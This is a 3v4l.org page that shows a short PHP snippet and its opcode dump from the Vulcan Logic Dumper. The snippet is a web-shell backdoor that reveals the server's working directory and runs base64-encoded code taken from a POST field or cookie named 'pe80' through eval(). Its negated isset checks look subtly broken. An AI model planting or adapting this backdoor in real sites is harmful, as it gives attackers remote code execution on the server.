3v4l.org

run code in 300+ PHP versions simultaneously
<?php if (!isset($_COOKIE['dwc'])) { echo '<cwd>' . getcwd() . '</cwd>'; } if (!isset($_POST['pe80'])) { eval(base64_decode($_POST['pe80'])); return; } if (!isset($_COOKIE['pe80'])) { eval(base64_decode($_COOKIE['pe80'])); return; } ?> <!--e318c732855cb5bd81b12ac251dbe9f6-->
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 4, Position 2 = 9
Branch analysis from position: 4
2 jumps found. (Code = 43) Position 1 = 13, Position 2 = 20
Branch analysis from position: 13
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 20
2 jumps found. (Code = 43) Position 1 = 24, Position 2 = 31
Branch analysis from position: 24
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 31
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 9
filename:       /in/3DcCo
function name:  (null)
number of ops:  33
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   FETCH_IS                                         ~0      '_COOKIE'
          1        ISSET_ISEMPTY_DIM_OBJ                         0  ~1      ~0, 'dwc'
          2        BOOL_NOT                                         ~2      ~1
          3      > JMPZ                                                     ~2, ->9
    3     4    >   INIT_FCALL                                               'getcwd'
          5        DO_ICALL                                         $3      
          6        CONCAT                                           ~4      '%3Ccwd%3E', $3
          7        CONCAT                                           ~5      ~4, '%3C%2Fcwd%3E'
          8        ECHO                                                     ~5
    5     9    >   FETCH_IS                                         ~6      '_POST'
         10        ISSET_ISEMPTY_DIM_OBJ                         0  ~7      ~6, 'pe80'
         11        BOOL_NOT                                         ~8      ~7
         12      > JMPZ                                                     ~8, ->20
    6    13    >   INIT_FCALL                                               'base64_decode'
         14        FETCH_R                      global              ~9      '_POST'
         15        FETCH_DIM_R                                      ~10     ~9, 'pe80'
         16        SEND_VAL                                                 ~10
         17        DO_ICALL                                         $11     
         18        INCLUDE_OR_EVAL                                          $11, EVAL
    7    19      > RETURN                                                   null
    9    20    >   FETCH_IS                                         ~13     '_COOKIE'
         21        ISSET_ISEMPTY_DIM_OBJ                         0  ~14     ~13, 'pe80'
         22        BOOL_NOT                                         ~15     ~14
         23      > JMPZ                                                     ~15, ->31
   10    24    >   INIT_FCALL                                               'base64_decode'
         25        FETCH_R                      global              ~16     '_COOKIE'
         26        FETCH_DIM_R                                      ~17     ~16, 'pe80'
         27        SEND_VAL                                                 ~17
         28        DO_ICALL                                         $18     
         29        INCLUDE_OR_EVAL                                          $18, EVAL
   11    30      > RETURN                                                   null
   14    31    >   ECHO                                                     '%3C%21--e318c732855cb5bd81b12ac251dbe9f6--%3E'
         32      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
168.75 ms | 1396 KiB | 17 Q